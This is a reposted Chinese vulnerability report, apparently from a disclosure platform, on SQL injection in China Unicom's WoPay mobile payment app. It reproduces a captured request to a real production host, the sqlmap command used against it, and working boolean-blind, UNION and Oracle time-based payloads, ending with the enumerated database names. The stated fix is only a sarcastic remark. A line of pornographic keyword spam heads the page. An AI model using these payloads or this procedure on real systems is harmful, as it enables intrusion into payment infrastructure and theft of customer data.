日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

oracle注射,中国联通沃支付一处Oracle数据库注射

發布時間:2023/12/20 数据库 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 oracle注射,中国联通沃支付一处Oracle数据库注射 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

打開從豌豆莢應用商店下載的"沃支付"APP,抓包發現這么一條請求code 區域POST /payFront2/recommend.action?operation=CX10 HTTP/1.1

content-type: text/xml

Accept-Charset: GB2312

contentType: GB2312

SignatureCharacter: c691b17a0cf059741addc0a597ed1789f2593f0d

CookieSafeStr: -1|b12e9d62f3fd2fd5cc993b765fc47e28

User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.2.2; virtual machine Build/JDQ39E)

Host: cellphonefront.unicompayment.com:55352

Connection: Keep-Alive

Accept-Encoding: gzip

Content-Length: 334

<?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0*0000000000000002CX10main

其中,2.1.0參數存在SQL注射。漏洞證明:

code 區域sqlmap.py -r e:\1.txt --force-ssl --skip-urlencode --dbs

code 區域sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: (custom) POST

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' AND 1553=1553 AND 'gdbh'='gdbh0000000000000002CX10main

Type: UNION query

Title: Generic UNION query (NULL) - 7 columns

Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' UNION ALL SELECT NULL,NULL,NULL,CHR(113)||CHR(111)||CHR(115)||CHR(105)||CHR(113)||CHR(72)||CHR(107)||CHR(72)||CHR(75)||CHR(84)||CHR(65)||CHR(72)||CHR(77)||CHR(86)||CHR(80)||CHR(113)||CHR(104)||CHR(98)||CHR(106)||CHR(113),NULL,NULL,NULL FROM DUAL-- 0000000000000002CX10main

Type: AND/OR time-based blind

Title: Oracle AND time-based blind (heavy query)

Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' AND 6395=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'KtUw'='KtUw0000000000000002CX10main

---

back-end DBMS: Oracle

available databases [6]:

[*] CELLPHONE_FRONT

[*] EXFSYS

[*] MDSYS

[*] SYS

[*] SYSTEM

[*] XDB

修復方案:

聯通更專業

總結

以上是生活随笔為你收集整理的oracle注射,中国联通沃支付一处Oracle数据库注射的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。